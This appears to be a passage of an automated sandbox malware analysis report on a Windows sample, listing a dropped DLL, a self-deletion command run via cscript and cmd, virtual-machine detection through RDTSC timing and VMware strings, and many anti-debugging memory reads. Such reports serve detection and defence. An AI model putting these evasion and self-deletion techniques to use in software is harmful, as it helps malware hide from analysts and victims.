          Source: msvofdls.dll.0.drStatic PE information: real checksum: 0x30354 should be: 0x25b81
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000001228604 second address: 000000000122860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000122899E second address: 00000000012289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6672Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}al
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sJ
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: cscript.exe, 00000006.00000002.567306194.0000000003670000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ackagesnH
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0G?
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.339354513.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10011C4A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10011C4A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10007C40 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapReAlloc,0_2_10007C40
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100217EA mov eax, dword ptr fs:[00000030h]0_2_100217EA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100219FE mov eax, dword ptr fs:[00000030h]0_2_100219FE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AAF mov eax, dword ptr fs:[00000030h]0_2_10021AAF
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AEE mov eax, dword ptr fs:[00000030h]0_2_10021AEE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021B2C mov eax, dword ptr fs:[00000030h]0_2_10021B2C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov ecx, dword ptr fs:[00000030h]1_2_00B3F0BF
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]1_2_00B3F0BF
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]1_2_00B3F0BF
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B490AF mov eax, dword ptr fs:[00000030h]1_2_00B490AF
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09080 mov eax, dword ptr fs:[00000030h]1_2_00B09080
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]1_2_00B83884
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]1_2_00B83884
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]1_2_00B040E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]1_2_00B040E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]1_2_00B040E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B058EC mov eax, dword ptr fs:[00000030h]1_2_00B058EC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B9B8D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]1_2_00B1B02A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]1_2_00B1B02A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]1_2_00B1B02A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]1_2_00B1B02A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]1_2_00B3002D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]1_2_00B3002D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]1_2_00B3002D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]1_2_00B3002D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]1_2_00B3002D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]1_2_00BD4015
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]1_2_00BD4015
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]1_2_00B87016
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]1_2_00B87016
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]1_2_00B87016
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1074 mov eax, dword ptr fs:[00000030h]1_2_00BD1074
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC2073 mov eax, dword ptr fs:[00000030h]1_2_00BC2073
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]1_2_00B20050
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]1_2_00B20050
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]1_2_00B851BE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]1_2_00B851BE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]1_2_00B851BE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]1_2_00B851BE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]1_2_00B361A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]1_2_00B361A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B869A6 mov eax, dword ptr fs:[00000030h]1_2_00B869A6
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32990 mov eax, dword ptr fs:[00000030h]1_2_00B32990
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C182 mov eax, dword ptr fs:[00000030h]1_2_00B2C182
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A185 mov eax, dword ptr fs:[00000030h]1_2_00B3A185
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B0B1E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B0B1E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B0B1E1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B941E8 mov eax, dword ptr fs:[00000030h]1_2_00B941E8
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]1_2_00B3513A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]1_2_00B3513A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120 mov ecx, dword ptr fs:[00000030h]1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]1_2_00B09100
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]1_2_00B09100
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]1_2_00B09100
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]1_2_00B0B171
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]1_2_00B0B171
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C962 mov eax, dword ptr fs:[00000030h]1_2_00B0C962
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]1_2_00B2B944
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]1_2_00B2B944
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B1AAB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B1AAB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FAB0 mov eax, dword ptr fs:[00000030h]1_2_00B3FAB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]1_2_00B052A5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]1_2_00B052A5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]1_2_00B052A5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]1_2_00B052A5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]1_2_00B052A5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]1_2_00B3D294
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]1_2_00B3D294
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32AE4 mov eax, dword ptr fs:[00000030h]1_2_00B32AE4
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32ACB mov eax, dword ptr fs:[00000030h]1_2_00B32ACB
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]1_2_00B44A2C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]1_2_00B44A2C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]1_2_00B05210
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov ecx, dword ptr fs:[00000030h]1_2_00B05210
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]1_2_00B05210
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]1_2_00B05210
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]1_2_00B0AA16
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]1_2_00B0AA16
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]1_2_00BCAA16
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]1_2_00BCAA16
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B23A1C mov eax, dword ptr fs:[00000030h]1_2_00B23A1C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B18A0A mov eax, dword ptr fs:[00000030h]1_2_00B18A0A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4927A mov eax, dword ptr fs:[00000030h]1_2_00B4927A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]1_2_00BBB260
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]1_2_00BBB260
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8A62 mov eax, dword ptr fs:[00000030h]1_2_00BD8A62
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCEA55 mov eax, dword ptr fs:[00000030h]1_2_00BCEA55
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B94257 mov eax, dword ptr fs:[00000030h]1_2_00B94257
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]1_2_00B09240
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]1_2_00B09240
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]1_2_00B09240
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]1_2_00B09240
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD5BA5 mov eax, dword ptr fs:[00000030h]1_2_00BD5BA5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]1_2_00B34BAD
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]1_2_00B34BAD
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]1_2_00B34BAD
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3B390 mov eax, dword ptr fs:[00000030h]1_2_00B3B390
